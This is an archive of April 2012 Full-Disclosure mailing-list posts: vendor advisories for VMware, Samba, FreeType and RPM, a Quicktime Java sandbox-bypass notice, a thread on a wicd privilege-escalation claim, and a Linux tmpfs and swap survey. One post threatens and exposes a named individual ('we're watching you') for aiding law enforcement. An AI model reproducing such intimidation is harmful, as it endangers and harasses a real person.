[Full-disclosure] VMSA-2012-0007 VMware hosted products and ESXi/ESX patches address privilege escalation
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 --- VMware Security Advisory Advisory ID: VMSA-2012-0007 Synopsis:VMware hosted products and ESXi/ESX patches address privilege escalation Issue date: 2012-04-12 Updated on: 2012-04-12 (initial advisory) CVE numbers: CVE-2012-1518 --- 1. Summary VMware hosted products and ESXi/ESX patches address privilege escalation. 2. Relevant releases Workstation 8.0.1 and earlier Player 4.0.1 and earlier Fusion 4.1.1 and earlier ESXi 5.0 without patch ESXi500-201203102-SG ESXi 4.1 without patch ESXi410-201201402-BG ESXi 4.0 without patch ESXi400-201203402-BG ESXi 3.5 without patch ESXe350-201203402-T-BG ESX 4.1 without patch ESX410-201201401-SG ESX 4.0 without patch ESX400-201203401-SG ESX 3.5 without patch ESX350-201203402-BG 3. Problem Description a. VMware Tools Incorrect Folder Permissions Privilege Escalation The access control list of the VMware Tools folder is incorrectly set. Exploitation of this issue may lead to local privilege escalation on Windows-based Guest Operating Systems. VMware would like to thank Tavis Ormandy for reporting this issue to us. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2012-1518 to this issue. Column 4 of the following table lists the action required to remediate the vulnerability in each release, if a solution is available. VMware Product Running Replace with/ ProductVersion on Apply Patch * = === = vCenterany Windows not affected Workstation8.x any 8.0.2 or later Player 4.x any 4.0.2 or later Fusion 4.x Mac OS/X 4.1.2 or later ** ESXi 5.0 ESXi ESXi500-201203102-SG ESXi 4.1 ESXi ESXi410-201201402-BG ESXi 4.0 ESXi ESXi400-201203402-BG ESXi 3.5 ESXi ESXe350-201203402-T-BG ESX4.1 ESX ESX410-201201401-SG ESX4.0 ESX ESX400-201203401-SG ESX3.5 ESX ESX350-201203402-BG * Notes on updating VMware Guest Tools: After the update or patch is applied, VMware Guest Tools must be updated in any pre-existing Windows-based Guest Operating System. Windows-Based Virtual Machines that have moved to Workstation 8, Player 4 or Fusion 4 from a lower version of Workstation, Player or Fusion are affected. ** The built-in update feature of Fusion can be used immediately to upgrade to 4.1.2. The Web download of Fusion 4.1.2 will be available on 2012-04-14. 4. Solution Please review the patch/release notes for your product and version and verify the checksum of your downloaded file. Workstation 8.0.2 - http://www.vmware.com/go/downloadworkstation Release notes: https://www.vmware.com/support/ws80/doc/releasenotes_workstation_802.html VMware Workstation for Windows 32-bit and 64-bit with VMware Tools md5sum: 912df11644fccac439b6fc5f80af5cdb sha1sum: 67af885d20a30f6074e2511f894fee321880 VMware Workstation for Linux 32-bit with VMware Tools md5sum: 121b026836091e6d06b09588afbbb4ed sha1sum: 94c4d04b7b24ae03ead29f17445d576173d40bb4 VMware Workstation for Linux 64-bit with VMware Tools md5sum: 0f41ba61117704201cfe99892405e179 sha1sum: 6ad52e8f0768e279639cd41abeda4f9358b40d0f Player 4.0.2 - http://www.vmware.com/go/downloadplayer Release notes: https://www.vmware.com/support/player40/doc/releasenotes_player402.html VMware Player for Windows 32-bit and 64-bit md5sum: 8ec9f7cb9556bad9c910a8a9794b3b57 sha1sum: d3613399fc25273ea51ead82ad8bf359f7fda6d1 VMware Player for Linux 32-bit md5sum: 9fd4bb474a47d5c538e5e806f91e5a40 sha1sum: a3973dd32a1a39644d30532dc4cb4c6216869415 VMware Player for Linux 64-bit md5sum: 5ba343c2c0392970ecceefa8397ac233 sha1sum: d417eb8538660db4ef07271fcc08152a3494bb58 Fusion 4.1.2 http://www.vmware.com/go/downloadfusion Release Notes: http://www.vmware.com/support/fusion4/doc/releasenotes_fusion_412.html VMware Fusion (for Intel-based Macs) md5sum: 1a40b9792306cbf4664dd72ac79baecf sha1sum: e4a9c6d60887ea8ff0fc7e770c4922cc7004b3e9 ESXi and ESX http://downloads.vmware.com/go/selfsupport-download ESXi 5.0 update-from-esxi5.0-5.0_update01 md5sum: 55c25bd990e2881462bc5b66fb5f6c39 sha1sum: ecd871bb09b649c6c8c13de82d579d4b7dcadc88 http://kb.vmware.com/kb/2010823 update-from-esxi5.0-5.0_update01 contains ESXi500-2012
Re: [Full-disclosure] Most Linux distributions don't use tmpfs nor encrypt swap by default
Fedora Core 15: /dev/mapper/vg_youwish-lv_swap swapswap defaults0 0 tmpfs /tmptmpfs defaults0 0 Removed other options it should have, but defaults do not include nosuid,nodev,noexec. On 4/12/12, Mark Krenz wrote: > > Hello. After posting the flaw with libvte's handling of the scrollback > buffer (writing it to disk), there were several people who made the > erroneous claim that most distributions of Linux use tmpfs now and > encrypt swap and that this shouldn't be an issue. > > Because these claims attempted to diminish the importance of the flaw > for many, I installed most of the popular distributions of Linux as well > as some of the BSDs for comparison to see what their default setup was > after installation. I have found that of the 35+ distribution versions > that I tested, only the latest Arch Linux puts /tmp on tmpfs by default > and the only other distributions that show it as an option during > installation are Mageia or PC Linux OS. So the libvte flaw indeed is a > widespread problem. > > I've documented the results at: > > http://www.climagic.org/bugreports/libvte-flaw-distro-defaults-chart.html > > > You can view the libvte bug report here: > > http://climagic.org/bugreports/libvte-scrollback-written-to-disk.html > > > Extra Note: I'm not suggesting that everyone put their /tmp on tmpfs > and/or start using encrypted filesystem. There are other considerations > which I talk about in the document above. > > > -- > Mark S. Krenz > IT Director > Suso Technology Services, Inc. > > Sent from Mutt using Linux > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Backtrack 5 R2 priv escalation 0day found in CTF exercise
They can now install wicd on a Linux machine and then say "Linux priv escalation 0day found in CTF exercise". hehehe 2012/4/12 InterN0T Advisories > And now for some truth / enlightenment: > > http://www.backtrack-linux.org/backtrack/backtrack-0day-privilege-escalation/ > http://www.backtrack-linux.org/forums/showthread.php?t=49411 > http://www.secmaniac.com/blog/ > > > On Wed, 11 Apr 2012 09:47:39 -0500, "Adam Behnke" > wrote: > > wicd Privilege Escalation 0Day > > Tested against Backtrack 5, 5 R2, Arch distributions > > > > Spawns a root shell. Has not been tested for potential remote > exploitation > > vectors. > > > > Discovered by a student that wishes to remain anonymous in the course > CTF. > > This 0day exploit for Backtrack 5 R2 was discovered by a student in the > > InfoSec Institute Ethical Hacking class, during an evening CTF exercise. > > The > > student wishes to remain anonymous, he has contributed a python version > of > > the 0day, a patch that can be applied to wicd, as well as a writeup > > detailing the discovery and exploitation process. You can find a python > > version of the exploit and full write up with patch here: > > http://www.infosecinstitute.com/courses/ethical_hacking_training.html > > > > > > > > > > > > ___ > > Full-Disclosure - We believe in it. > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > > Hosted and sponsored by Secunia - http://secunia.com/ > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Erronous post concerning Backtrack 5 R2 0day
in soviet russia, lesson teaches you. in west, no lesson learnt by anyone. On Thu, Apr 12, 2012 at 9:51 PM, Adam Behnke wrote: > Yesterday I made a post concerning a 0day advisory in Backtrack 5 R2: > http://seclists.org/fulldisclosure/2012/Apr/123 > > The posting was incorrect, the vulnerability was NOT in Backtrack but in > wicd, no Backtrack contributed code is vulnerable. When we tweeted and > emailed to mailing lists the notifications of this vulnerability, we > incorrectly shortened the title and called it "Backtrack 5 R2 priv > escalation 0day ", which is misleading and could lead people to believe the > bug was actually in Backtrack. The bug has always resided in wicd and not in > any Backtrack team written code. We apologize for the confusion to the > Backtrack team and any other persons affected by this error. We feel the > Backtrack distro is a great piece of software and wish muts and the rest of > the team the best. > > > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Erronous post concerning Backtrack 5 R2 0day
Yesterday I made a post concerning a 0day advisory in Backtrack 5 R2: http://seclists.org/fulldisclosure/2012/Apr/123 The posting was incorrect, the vulnerability was NOT in Backtrack but in wicd, no Backtrack contributed code is vulnerable. When we tweeted and emailed to mailing lists the notifications of this vulnerability, we incorrectly shortened the title and called it "Backtrack 5 R2 priv escalation 0day ", which is misleading and could lead people to believe the bug was actually in Backtrack. The bug has always resided in wicd and not in any Backtrack team written code. We apologize for the confusion to the Backtrack team and any other persons affected by this error. We feel the Backtrack distro is a great piece of software and wish muts and the rest of the team the best. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] [DSA 2450-1] samba security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - Debian Security Advisory DSA-2450-1 secur...@debian.org http://www.debian.org/security/ Thijs Kinkhorst April 12, 2012 http://www.debian.org/security/faq - - Package: samba Vulnerability : privilege escalation Problem type : remote Debian-specific: no CVE ID : CVE-2012-1182 Debian Bug : 668309 It was discovered that Samba, the SMB/CIFS file, print, and login server, contained a flaw in the remote procedure call (RPC) code which allowed remote code execution as the super user from an unauthenticated connection. For the stable distribution (squeeze), this problem has been fixed in version 2:3.5.6~dfsg-3squeeze7. For the testing distribution (wheezy), this problem will be fixed soon. For the unstable distribution (sid), this problem has been fixed in version 2:3.6.4-1. We recommend that you upgrade your samba packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.12 (GNU/Linux) iQEcBAEBAgAGBQJPhzVlAAoJEOxfUAG2iX57T1EIAJ230mSOLfaEWx4v4PCj9XZw Q0taVCU5zIHaQH8engWvvlY+2FAcmgKX+1mycSJwB8OSNtRyhyoXZ5+BlcoQt5dW pJOo/CJwTpSOjJ0SQDw4H7cvmq8eqKPLegC+PbSbIWJUktd+EgTIHNLIXqcn5LK4 cXdz87QDP5zY002XXHCpDaTjbQCTtiGy0aT9QMmbZeyovJSP+t24v3sAi5juM+qA pnTMsrDCjVaLN6DgyFAXhaaZTpzE1R8IoKs5P+nbhPrf9WpDgmj3WpKx9d7TA01V ZU6lFplQWTGOWOJjrfjK2abLoGluO7MWqj7zAoYrR4ZKodKuM1OL9EGHHt9DjA4= =bYaf -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SE-2012-01] Security weakness in Apple Quicktime Java extensions
Hello, Security Explorations discovered a security vulnerability in Apple Quicktime [1] software and its Java extensions in particular. When combined with the Issue 15 reported to Oracle on Apr 2 2012 [2], this new issue might be used to successfully bypass all JVM security restrictions on a vulnerable system. Security Explorations developed a Proof of Concept code that exploits Issue 15 and the new Apple Quicktime flaw (Issue 22) to achieve a complete JVM security sandbox bypass in a Windows OS environment. The code targets 32-bit Java Plugin only (the default for 32-bit web browsers) and Apple Quicktime 7.7.1. It has been successfully tested with the following combination of Java SE, OS and web browsers: - Windows XP SP3, Windows 7 HP 64-bit, Windows 7 Pro 32-bit, - Mozilla Firefox 11.0, Internet Explorer 9.0, Opera 11.62, - JRE / JDK 1.6 Update 31. Issue 22 could not be exploited in a 64-bit JRE environment. This is due to the fact that 32-bit web browsers do not seem to work with a 64-bit Java at all. For a 64-bit web browser such as Internet Explorer and corresponding 64-bit JRE Plugin, no Quicktime Java extensions are visible in a target JVM's system classloader namespace. On Apr 12 2012, Security Explorations sent a security notice to Apple informing the company about a discovered vulnerability. Along with the notice, the company also received our Proof of Concept code. More technical details regarding the discovered security vulnerability in Apple Quicktime will be disclosed at the time of the publication of the SE-2012-01 project (Security Vulnerabilities in Java SE). Thank you. Best Regards Adam Gowdiak - Security Explorations http://www.security-explorations.com "We bring security research to the new level" - References: [1] Apple Quicktime http://www.apple.com/quicktime/what-is/ [2] SE-2012-01, Vendors status http://www.security-explorations.com/en/SE-2012-01-status.html ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Last Mile, April 20 || CfP: SECURWARE 2012 || August 19-24, 2012 - Rome, Italy
INVITATION: = Please consider to contribute to and/or forward to the appropriate groups the following opportunity to submit and publish original scientific results to SECURWARE 2012. The submission deadline is set to April 20, 2012. In addition, authors of selected papers will be invited to submit extended article versions to one of the IARIA Journals: http://www.iariajournals.org = == SECURWARE 2012 | Call for Papers === CALL FOR PAPERS, TUTORIALS, PANELS SECURWARE 2012: The Sixth International Conference on Emerging Security Information, Systems and Technologies August 19-24, 2012 - Rome, Italy General page: http://www.iaria.org/conferences2012/SECURWARE12.html Call for Papers: http://www.iaria.org/conferences2012/CfPSECURWARE12.html - regular papers - short papers (work in progress) - posters Submission page: http://www.iaria.org/conferences2012/SubmitSECURWARE12.html Submission deadline: April 20, 2012 Sponsored by IARIA, www.iaria.org Extended versions of selected papers will be published in IARIA Journals: http://www.iariajournals.org Please note the Poster and Work in Progress options. The topics suggested by the conference can be discussed in term of concepts, state of the art, research, standards, implementations, running experiments, applications, and industrial case studies. Authors are invited to submit complete unpublished papers, which are not under review in any other conference or journal in the following, but not limited to, topic areas. All tracks are open to both research and industry contributions, in terms of Regular papers, Posters, Work in progress, Technical/marketing/business presentations, Demos, Tutorials, and Panels. Before submission, please check and comply with the editorial rules: http://www.iaria.org/editorialrules.html SECURWARE 2012 Topics (topics and submission details: see CfP on the site) ARCH: Security frameworks, architectures and protocols Formal aspects of security; Security analysis methodologies; Security verification; Security protocols; Security architectures and formalisms; Security and design vulnerability; Security and privacy protection; Performance and security; Secure group communication/multicast; Software design security; Middleware security; Security for nomadic code; Intrusion detection systems; Static analysis for software security; Security modeling METRICS: Security, trust and privacy measurement Security, trust and privacy metrics; Security assurance metrics; Security measurement architectures; Metrics for adaptive security systems; Taxonomical and ontological support of security metrics; Experiments and benchmarks for security measurements; Embedding security measurability in software and service architectures; Risk-driven assessment of security; Assessment of effectiveness, efficiency and correctness of security; Mapping security metrics and security assurance metrics; Mapping security measurements and non-functional requirements SECMAN: Security management Identity management; Security law enforcement; PKI; PKI Key management; Incident response planning; Intrusion detection and event correlation; Firewalls; Trust management; Software security assurance SECTECH: Security technologies Secure protocols; Applied cryptography; Smart cards; Biometrics; Digital rights management; Electronic surveillance; Database security SYSSEC: System security Internet security; Security in wireless; Sensor/cellular network security; Ad hoc network security; Security in peer-to-peer networks; Security in wireless multimedia systems; Security in different networks (mesh, personal, local, metropolitan, GSM, Bluetooth, WiMax, IEEE 802.x, etc.); Security of emergency services INFOSEC: Information security Information hiding; Anonymity; Authentication; Data Integrity; Security data mining; Data confidentiality and integrity; Information flow protection; Trustworthy networks: authentication, privacy and security models; Secure service discovery; Secure location-based service; Information survivability RISK: Risk and security Operational risk (opRisk); OpRisk and field studies; Reputation risk; Risk and security-awareness; Business continuity and disaster recovery; Privacy-awareness; Security and trust MALWA: Malware and Anti-malware Threat taxonomies and modeling; Security threats; Threats propagation; Anti-malware technologies; Engineering anti-malware; Anti-virus, anti-spyware, anti-phishing; Malware propagation models; Profiling security information; Vulnerability analysis and countermeasures; Denial of service attacks; Measurements and metrics; Testing samples and techniques; Quarantine/reuse decisions; Anti-malware tool performance; Anti-malware tool suites; Open-source anti-malware; Host-based anti-malware; On-line anti-malware scanning MISUSE: Electronic abuse protection Messaging, viruses, spyware; Advanced misuse detection techniques /machine learning
[Full-disclosure] Most Linux distributions don't use tmpfs nor encrypt swap by default
Hello. After posting the flaw with libvte's handling of the scrollback buffer (writing it to disk), there were several people who made the erroneous claim that most distributions of Linux use tmpfs now and encrypt swap and that this shouldn't be an issue. Because these claims attempted to diminish the importance of the flaw for many, I installed most of the popular distributions of Linux as well as some of the BSDs for comparison to see what their default setup was after installation. I have found that of the 35+ distribution versions that I tested, only the latest Arch Linux puts /tmp on tmpfs by default and the only other distributions that show it as an option during installation are Mageia or PC Linux OS. So the libvte flaw indeed is a widespread problem. I've documented the results at: http://www.climagic.org/bugreports/libvte-flaw-distro-defaults-chart.html You can view the libvte bug report here: http://climagic.org/bugreports/libvte-scrollback-written-to-disk.html Extra Note: I'm not suggesting that everyone put their /tmp on tmpfs and/or start using encrypted filesystem. There are other considerations which I talk about in the document above. -- Mark S. Krenz IT Director Suso Technology Services, Inc. Sent from Mutt using Linux ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Patrick Belcher
This is just a message for Patrick Belcher, CISSP... we're watching you. Seems he's been investigating, collecting and providing information about Occupy and Anonymous (and similar groups) to people in Law Enforcement and trying to keep his name out of it for fear of retaliation. Welcome to public exposure, Patrick! ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Backtrack 5 R2 priv escalation 0day found in CTF exercise
And now for some truth / enlightenment: http://www.backtrack-linux.org/backtrack/backtrack-0day-privilege-escalation/ http://www.backtrack-linux.org/forums/showthread.php?t=49411 http://www.secmaniac.com/blog/ On Wed, 11 Apr 2012 09:47:39 -0500, "Adam Behnke" wrote: > wicd Privilege Escalation 0Day > Tested against Backtrack 5, 5 R2, Arch distributions > > Spawns a root shell. Has not been tested for potential remote exploitation > vectors. > > Discovered by a student that wishes to remain anonymous in the course CTF. > This 0day exploit for Backtrack 5 R2 was discovered by a student in the > InfoSec Institute Ethical Hacking class, during an evening CTF exercise. > The > student wishes to remain anonymous, he has contributed a python version of > the 0day, a patch that can be applied to wicd, as well as a writeup > detailing the discovery and exploitation process. You can find a python > version of the exploit and full write up with patch here: > http://www.infosecinstitute.com/courses/ethical_hacking_training.html > > > > > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2012:057 ] freetype2
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2012:057 http://www.mandriva.com/security/ ___ Package : freetype2 Date: April 12, 2012 Affected: 2010.1, 2011., Enterprise Server 5.0 ___ Problem Description: Multiple flaws were found in FreeType. Specially crafted files could cause application crashes or potentially execute arbitrary code (CVE-2012-1126, CVE-2012-1127, CVE-2012-1128, CVE-2012-1129, CVE-2012-1130, CVE-2012-1131, CVE-2012-1132, CVE-2012-1133, CVE-2012-1134, CVE-2012-1135, CVE-2012-1136, CVE-2012-1137, CVE-2012-1138, CVE-2012-1139, CVE-2012-1140, CVE-2012-1141, CVE-2012-1142, CVE-2012-1143, CVE-2012-1144). The updated packages have been patched to correct this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1126 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1127 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1128 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1129 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1130 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1131 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1132 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1133 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1134 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1135 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1136 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1137 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1138 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1139 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1140 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1141 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1142 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1143 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1144 ___ Updated Packages: Mandriva Linux 2010.1: 27ac5c46bbcaee8f960d654b08c620c3 2010.1/i586/freetype2-demos-2.3.12-1.9mdv2010.2.i586.rpm d2d6c24a4614ff3b838cd082c4487da6 2010.1/i586/libfreetype6-2.3.12-1.9mdv2010.2.i586.rpm 613f7d3ac7de3f5eee9b1dc925d37816 2010.1/i586/libfreetype6-devel-2.3.12-1.9mdv2010.2.i586.rpm 002b002cde3335b8c16875543886fd92 2010.1/i586/libfreetype6-static-devel-2.3.12-1.9mdv2010.2.i586.rpm 0d6c1904469c22a77428c4323bc9ce59 2010.1/SRPMS/freetype2-2.3.12-1.9mdv2010.2.src.rpm Mandriva Linux 2010.1/X86_64: fa720ee6e2ba28b1e3ab8b6908dc8389 2010.1/x86_64/freetype2-demos-2.3.12-1.9mdv2010.2.x86_64.rpm ce9ff4d173364d3f3dd02eadcaa00558 2010.1/x86_64/lib64freetype6-2.3.12-1.9mdv2010.2.x86_64.rpm cb39f796366819450d8221263bbe52a7 2010.1/x86_64/lib64freetype6-devel-2.3.12-1.9mdv2010.2.x86_64.rpm 0d22f0778fa4fd37c3cf23aca2e540ae 2010.1/x86_64/lib64freetype6-static-devel-2.3.12-1.9mdv2010.2.x86_64.rpm 0d6c1904469c22a77428c4323bc9ce59 2010.1/SRPMS/freetype2-2.3.12-1.9mdv2010.2.src.rpm Mandriva Linux 2011: b132cce68da5b73b5c0eb3ab6334344f 2011/i586/freetype2-demos-2.4.5-2.3-mdv2011.0.i586.rpm 49543c61a1547907c31c456023e5e3d6 2011/i586/libfreetype6-2.4.5-2.3-mdv2011.0.i586.rpm 7e2fea21d3346ef0102b01e457338c8c 2011/i586/libfreetype6-devel-2.4.5-2.3-mdv2011.0.i586.rpm 0624a5a99801fdfc15e4e681a6694e1f 2011/i586/libfreetype6-static-devel-2.4.5-2.3-mdv2011.0.i586.rpm 9fa0927b963e00c52a5cc8e52b60488f 2011/SRPMS/freetype2-2.4.5-2.3.src.rpm Mandriva Linux 2011/X86_64: 1af1f5c163d649294da57bf35747f392 2011/x86_64/freetype2-demos-2.4.5-2.3-mdv2011.0.x86_64.rpm 445ecaeea2d4ff7eb21c13c2d0b6559f 2011/x86_64/lib64freetype6-2.4.5-2.3-mdv2011.0.x86_64.rpm 53f8909052fd9b9d0abf7223d4eccb75 2011/x86_64/lib64freetype6-devel-2.4.5-2.3-mdv2011.0.x86_64.rpm 8d964347212fe30961ec6b542388475e 2011/x86_64/lib64freetype6-static-devel-2.4.5-2.3-mdv2011.0.x86_64.rpm 9fa0927b963e00c52a5cc8e52b60488f 2011/SRPMS/freetype2-2.4.5-2.3.src.rpm Mandriva Enterprise Server 5: a8a99f3672f9c34568bcec2ec67c961e mes5/i586/freetype2-demos-2.3.7-1.10mdvmes5.2.i586.rpm 1350b0bf938ba4ac67a148371578dc67 mes5/i586/libfreetype6-2.3.7-1.10mdvmes5.2.i586.rpm 4e86fcdc1e2b69f12ce4ba3ffc64fe40 mes5/i586/libfreetype6-devel-2.3.7-1.10mdvmes5.2.i586.rpm 3441e06db6fccb035e4f73626c74e694 mes5/i586/libfreetype6-static-devel-2.3.7-1.10mdvmes5.2.i586.rpm 40e296bda353cb4351feb3dec6e8b508 mes5/SRPMS/freetype2-2.3.7-1.10mdvmes5.2.src.rpm Mandriva Enterprise Server 5/X86_64: 1908a8af14e177717a3c8fc962834019 mes5/x86_64/freetype2-demos-2.3.7-1.10mdvmes5.2.x86_64.rpm 79a9c7f036c2d69027b5aaabc39554a4 mes5/x86_64/lib64f
[Full-disclosure] [ MDVSA-2012:056 ] rpm
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2012:056 http://www.mandriva.com/security/ ___ Package : rpm Date: April 12, 2012 Affected: 2010.1, Enterprise Server 5.0 ___ Problem Description: Multiple flaws were found in the way RPM parsed package file headers. An attacker could create a specially-crafted RPM package that, when its package header was accessed, or during package signature verification, could cause an application using the RPM library to crash or, potentially, execute arbitrary code (CVE-2012-0060, CVE-2012-0061, CVE-2012-0815). The updated packages have been patched to correct this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0815 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0060 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0061 https://bugzilla.redhat.com/show_bug.cgi?id=744104 https://bugzilla.redhat.com/show_bug.cgi?id=744858 https://bugzilla.redhat.com/show_bug.cgi?id=798585 ___ Updated Packages: Mandriva Linux 2010.1: 9e1b132327478c9360ece7349e18a9e2 2010.1/i586/librpm4.6-4.6.0-14.3mnb2.i586.rpm abecf87f397158deba9847c041c755f2 2010.1/i586/librpm-devel-4.6.0-14.3mnb2.i586.rpm c4698c7b44131d99d537466a36586fe4 2010.1/i586/python-rpm-4.6.0-14.3mnb2.i586.rpm 44a009a58fc818a32d56e4299717e980 2010.1/i586/rpm-4.6.0-14.3mnb2.i586.rpm c09242d3b395c87ce4af8adef68e3650 2010.1/i586/rpm-build-4.6.0-14.3mnb2.i586.rpm 0079ef14e924fe4b895ac2c6e4aa7e7e 2010.1/SRPMS/rpm-4.6.0-14.3mnb2.src.rpm Mandriva Linux 2010.1/X86_64: e32e3268d8378c46a644461bdeaebe19 2010.1/x86_64/lib64rpm4.6-4.6.0-14.3mnb2.x86_64.rpm a3b9ec22bd2fe5013495d274cc6951e7 2010.1/x86_64/lib64rpm-devel-4.6.0-14.3mnb2.x86_64.rpm 4ce2139331610a7da4f716616ab58090 2010.1/x86_64/python-rpm-4.6.0-14.3mnb2.x86_64.rpm 4ffc4a9fb5dc6cbc6a3e227808eb3789 2010.1/x86_64/rpm-4.6.0-14.3mnb2.x86_64.rpm 620a8f6b77ae358d44d4663f9a3813c8 2010.1/x86_64/rpm-build-4.6.0-14.3mnb2.x86_64.rpm 0079ef14e924fe4b895ac2c6e4aa7e7e 2010.1/SRPMS/rpm-4.6.0-14.3mnb2.src.rpm Mandriva Enterprise Server 5: 680fe37856e6b83a59974fc0e8e2c6dc mes5/i586/libpopt0-1.10.8-32.6mdvmes5.2.i586.rpm 4298ea7ca0bd11449807c4301e10d02c mes5/i586/libpopt-devel-1.10.8-32.6mdvmes5.2.i586.rpm 4635135a045cfa334ebf436413d98773 mes5/i586/librpm4.4-4.4.2.3-20.6mnb2.i586.rpm 1cb888289ad094ead65f37bf3a646d2b mes5/i586/librpm-devel-4.4.2.3-20.6mnb2.i586.rpm 20cb0ff05d10165c6dc8a228efe33bd7 mes5/i586/popt-data-1.10.8-32.6mdvmes5.2.i586.rpm fef2b1b8257f3c05c6234638cca51406 mes5/i586/python-rpm-4.4.2.3-20.6mnb2.i586.rpm 2c25256615872afca48ce9fdd494e754 mes5/i586/rpm-4.4.2.3-20.6mnb2.i586.rpm 5d241b77bc2527fd06e011e4b4357196 mes5/i586/rpm-build-4.4.2.3-20.6mnb2.i586.rpm ab76b196995daf3d6520a1487bac3476 mes5/SRPMS/rpm-4.4.2.3-20.6mnb2.src.rpm Mandriva Enterprise Server 5/X86_64: 4814b370db9153be43a18674856a6fa3 mes5/x86_64/lib64popt0-1.10.8-32.6mdvmes5.2.x86_64.rpm 3336212f2a536cee9b02a7dab4c3efc0 mes5/x86_64/lib64popt-devel-1.10.8-32.6mdvmes5.2.x86_64.rpm 00b4f204cc4ad2d1256d0f69dafda995 mes5/x86_64/lib64rpm4.4-4.4.2.3-20.6mnb2.x86_64.rpm dd33ece001075c1d6e37dcf820a6d357 mes5/x86_64/lib64rpm-devel-4.4.2.3-20.6mnb2.x86_64.rpm 580dcf05e3e47a8135b7e066273f3804 mes5/x86_64/popt-data-1.10.8-32.6mdvmes5.2.x86_64.rpm fee35b070922af18c961d5d32f4e4f59 mes5/x86_64/python-rpm-4.4.2.3-20.6mnb2.x86_64.rpm 3112dba52cc15c3e7e74673050032a25 mes5/x86_64/rpm-4.4.2.3-20.6mnb2.x86_64.rpm 0e6a9bfe132f3062c1282b340fba3cad mes5/x86_64/rpm-build-4.4.2.3-20.6mnb2.x86_64.rpm ab76b196995daf3d6520a1487bac3476 mes5/SRPMS/rpm-4.4.2.3-20.6mnb2.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.11 (GNU/Linux) iD8DBQFPhmRLmqjQ0CJFipgRAtIdAJ9jwB7T3xBDAT8yCUm4Kr9F3X9MpACcCfPx ghbkzjnRg4r26YuzBXin
[Full-disclosure] Crystal Office Suite v1.43 - Buffer Overflow Vulnerability
